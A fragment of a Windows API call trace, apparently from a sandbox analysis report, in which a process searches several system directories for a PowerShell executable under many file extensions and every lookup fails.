	[0358.175] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.183] SetErrorMode (uMode=0x1) returned 0x1
	[0358.184] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.185] SetErrorMode (uMode=0x1) returned 0x1
	[0358.185] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.192] SetErrorMode (uMode=0x1) returned 0x1
	[0358.194] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.194] SetErrorMode (uMode=0x1) returned 0x1
	[0358.194] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.282] SetErrorMode (uMode=0x1) returned 0x1
	[0358.283] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.283] SetErrorMode (uMode=0x1) returned 0x1
	[0358.283] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.291] SetErrorMode (uMode=0x1) returned 0x1
	[0358.292] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.292] SetErrorMode (uMode=0x1) returned 0x1
	[0358.292] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.300] SetErrorMode (uMode=0x1) returned 0x1
	[0358.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.302] SetErrorMode (uMode=0x1) returned 0x1
	[0358.302] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.302] SetErrorMode (uMode=0x1) returned 0x1
	[0358.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.302] SetErrorMode (uMode=0x1) returned 0x1
	[0358.303] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.303] SetErrorMode (uMode=0x1) returned 0x1
	[0358.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.303] SetErrorMode (uMode=0x1) returned 0x1
	[0358.303] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.303] SetErrorMode (uMode=0x1) returned 0x1
	[0358.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.304] SetErrorMode (uMode=0x1) returned 0x1
	[0358.304] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.304] SetErrorMode (uMode=0x1) returned 0x1
	[0358.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.304] SetErrorMode (uMode=0x1) returned 0x1
	[0358.304] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.305] SetErrorMode (uMode=0x1) returned 0x1
	[0358.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.305] SetErrorMode (uMode=0x1) returned 0x1
	[0358.305] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.305] SetErrorMode (uMode=0x1) returned 0x1
	[0358.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.306] SetErrorMode (uMode=0x1) returned 0x1
	[0358.306] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.306] SetErrorMode (uMode=0x1) returned 0x1
	[0358.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.306] SetErrorMode (uMode=0x1) returned 0x1
	[0358.306] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.307] SetErrorMode (uMode=0x1) returned 0x1
	[0358.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.307] SetErrorMode (uMode=0x1) returned 0x1
	[0358.307] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.307] SetErrorMode (uMode=0x1) returned 0x1
	[0358.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.307] SetErrorMode (uMode=0x1) returned 0x1
	[0358.308] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.308] SetErrorMode (uMode=0x1) returned 0x1
	[0358.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.308] SetErrorMode (uMode=0x1) returned 0x1
	[0358.308] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.308] SetErrorMode (uMode=0x1) returned 0x1
	[0358.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.309] SetErrorMode (uMode=0x1) returned 0x1
	[0358.309] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.309] SetErrorMode (uMode=0x1) returned 0x1
	[0358.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.309] SetErrorMode (uMode=0x1) returned 0x1
	[0358.309] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.310] SetErrorMode (uMode=0x1) returned 0x1
	[0358.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.310] SetErrorMode (uMode=0x1) returned 0x1
	[0358.310] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.310] SetErrorMode (uMode=0x1) returned 0x1
	[0358.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0358.310] SetErrorMode (uMode=0x1) returned 0x1
	[0358.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.311] SetErrorMode (uMode=0x1) returned 0x1
	[0358.311] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.311] SetErrorMode (uMode=0x1) returned 0x1
	[0358.311] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.311] SetErrorMode (uMode=0x1) returned 0x1
	[0358.311] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.312] SetErrorMode (uMode=0x1) returned 0x1
	[0358.312] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.312] SetErrorMode (uMode=0x1) returned 0x1
	[0358.312] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.312] SetErrorMode (uMode=0x1) returned 0x1
	[0358.312] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.312] SetErrorMode (uMode=0x1) returned 0x1
	[0358.313] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.313] SetErrorMode (uMode=0x1) returned 0x1
	[0358.313] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.313] SetErrorMode (uMode=0x1) returned 0x1
	[0358.313] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.313] SetErrorMode (uMode=0x1) returned 0x1
	[0358.313] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.314] SetErrorMode (uMode=0x1) returned 0x1
	[0358.314] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.314] SetErrorMode (uMode=0x1) returned 0x1
	[0358.314] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.314] SetErrorMode (uMode=0x1) returned 0x1
	[0358.314] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.315] SetErrorMode (uMode=0x1) returned 0x1
	[0358.315] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.315] SetErrorMode (uMode=0x1) returned 0x1
	[0358.315] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.315] SetErrorMode (uMode=0x1) returned 0x1
	[0358.315] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.315] SetErrorMode (uMode=0x1) returned 0x1
	[0358.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.316] SetErrorMode (uMode=0x1) returned 0x1
	[0358.316] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.316] SetErrorMode (uMode=0x1) returned 0x1
	[0358.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.316] SetErrorMode (uMode=0x1) returned 0x1
	[0358.316] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.317] SetErrorMode (uMode=0x1) returned 0x1
	[0358.317] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.317] SetErrorMode (uMode=0x1) returned 0x1
